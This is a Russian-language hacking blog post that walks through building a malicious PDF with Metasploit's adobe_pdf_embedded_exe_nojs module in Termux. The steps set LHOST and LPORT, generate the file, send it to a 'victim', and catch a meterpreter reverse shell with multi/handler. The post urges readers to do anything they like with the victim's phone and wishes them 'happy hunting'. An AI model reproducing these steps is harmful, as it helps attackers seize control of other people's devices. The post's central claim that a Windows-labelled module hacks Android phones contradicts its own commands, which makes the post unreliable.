Join
hackerplace.org
@hackerplace_org
Hacking
August 11, 2022

Как взломать Android смартфон через .PDF файл

Простейшая атака, которую ты сможешь повторить даже не имея компьютера.

Всем салют, дорогие друзья!
По вашим многочисленным просьбам, эта статья посвящена взлому Android смартфона с помощью PDF-файла.

Для проведения данной атаки можно использовать не только компьютер с установленным Linux, но и свой Android смартфон (вам понадобится установить Termux).

Сейчас расскажем все подробнее...

Вам понадобится:

  1. Приложение Termux (загрузите его из Play Store или F-Droid).
  2. Установить Metasploit Framework в Termux.
  3. Termux должен иметь возможность использовать внешнее хранилище (для этого введите команду: termux-setup-storage).
  4. (Рекомендуется, но не обязательно) Установите клавиатуру Hacker's Keyboard для легкого ввода команд в Termux.

После того, как вcе описанное выше - выполнено, можно приступать к взлому.

Запуск консоли Metasploit

  • Откройте Termux, если используете свой смартфон, или терминал, если используется компьютер с Linux.
  • Введите следующую команду, чтобы открыть консоль Metasploit

msfconsole

  • Если вы видите экран, как на скрине ниже, то все хорошо:

Создание PDF-файла (Полезная нагрузка)

  • Введите команду, приведенную ниже:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Затем вы должны настроить Localhost. Для этого вам понадобится ваш IP-адрес, чтобы проверить его тип, вводите в новом окне session на termux или в другом окне терминала:

ifconfig

  • Теперь зайдите в свою консоль metasploit и вбейте свой IP следующим образом:

set LHOST 192.168.0.0

Замените IP-адрес, указанный в приведенной выше команде, вашим собственным IP-адресом
  • Теперь пришло время для настройки порта. Для этого введите следующую команду:

set LPORT 4444

Вы можете использовать любой порт, например 4564, 8080 и т.д.
  • Далее мы сгенерируем наш PDF файл с помощью команды ниже:

set filename MyDocument.pdf

Вы можете использовать любое имя, которое хотите. Просто подставьте его вместо MyDocument. Не забудьте вписать .pdf в конце его названия.
  • Закончим процесс создания, введя команду:
exploit
  • Теперь в течение секунды появится сообщение о том, что ваш PDF-файл создан.
  • Остается отправить этот файл своей жертве. Как только она его откроет, вы получите сеанс metasploit.

Использование

  • Сначала откройте консоль metasploit, набрав:

msfconsole

  • А затем впишите команды:

use exploit/multi/handler/ set LHOST <your_IP> set LPORT 4444 exploit

Убедитесь, что вы ввели тот же IP-адрес и порт, что и выше, во 2-м шаге.
  • Пройдет немного времени, после чего вы получите сеанс meterpreter.
  • Поздравляю! Вы получили доступ к смартфону жертвы и можете делать с ним все, что душе угодно.

На сегодня это все. Удачной охоты!

👉Да, хочу!ᅠ

August 11, 2022, 10:27
0 views